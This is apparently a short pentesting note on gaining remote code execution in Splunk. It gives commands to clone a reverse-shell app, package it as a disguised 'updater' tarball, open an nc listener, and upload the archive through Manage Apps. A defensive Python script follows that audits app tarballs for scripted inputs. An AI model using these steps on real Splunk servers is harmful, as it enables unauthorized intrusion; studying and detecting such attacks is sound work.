RCE

Create a malicious Splunk app to upload:

git clone https://github.com/0xjpuff/reverse_shell_splunk.git
mkdir updater
cp -r reverse_shell_splunk/reverse_shell_splunk/bin reverse_shell_splunk/reverse_shell_splunk/default ./updater
# Edit this revshell script if the target is linux
vim ./updater/bin/rev.py
# Edit the .ps1 if the target is windows
vim ./updater/bin/run.ps1
tar -czvf updater.tar.gz updater
nc -nvlp 9001

On the home page, click Splunk Apps.

Then, toward the top left, go to Apps -> Manage Apps.

Finally, choose Install app from file and upload your malicious tarball.
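Because "Install app from file" accepts any tarball with `bin/` and `default/` directories, it helps to inspect an archive before it is installed. The sketch below is an added example, not code from this page or from the referenced repository. It assumes the app runs its `bin/` script through Splunk's scripted-input mechanism (`[script://...]` stanzas in `inputs.conf`). The function names and the sample archive are constructed for illustration.

```python
import io
import tarfile
SCRIPT_EXTS = (".py", ".ps1", ".bat", ".cmd", ".sh", ".exe")

def parse_conf(text):
    """Parse Splunk .conf text into {stanza: {key: value}}."""
    stanzas, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = stanzas.setdefault(line[1:-1], {})
        elif "=" in line and current is not None and not line.startswith("#"):
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip()
    return stanzas

def audit_app(fileobj):
    """List script files and scripted inputs in an app tarball before install."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar.getmembers():
            parts = member.name.replace("\\", "/").split("/")
            if not member.isfile() or len(parts) < 3:
                continue
            if parts[1] == "bin" and parts[-1].lower().endswith(SCRIPT_EXTS):
                findings.append(("script-file", member.name))
            if parts[1] in ("default", "local") and parts[-1] == "inputs.conf":
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                for stanza, settings in parse_conf(text).items():
                    if stanza.startswith("script://"):
                        off = settings.get("disabled", "0").lower() in ("1", "true")
                        state = "disabled" if off else "enabled"
                        findings.append((f"scripted-input-{state}", stanza))
    return findings

def build_sample():
    """Constructed sample mirroring the updater/ layout; contains no payload."""
    files = {"updater/bin/rev.py": b"# placeholder only\n",
             "updater/default/inputs.conf": b"[script://./bin/rev.py]\ndisabled = 0\n"}
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

if __name__ == "__main__":
    print(audit_app(build_sample()))
```

An enabled `script://` stanza pointing at a file under `bin/` in an app nobody requested is the finding to escalate, and restricting who can install apps removes the upload path entirely.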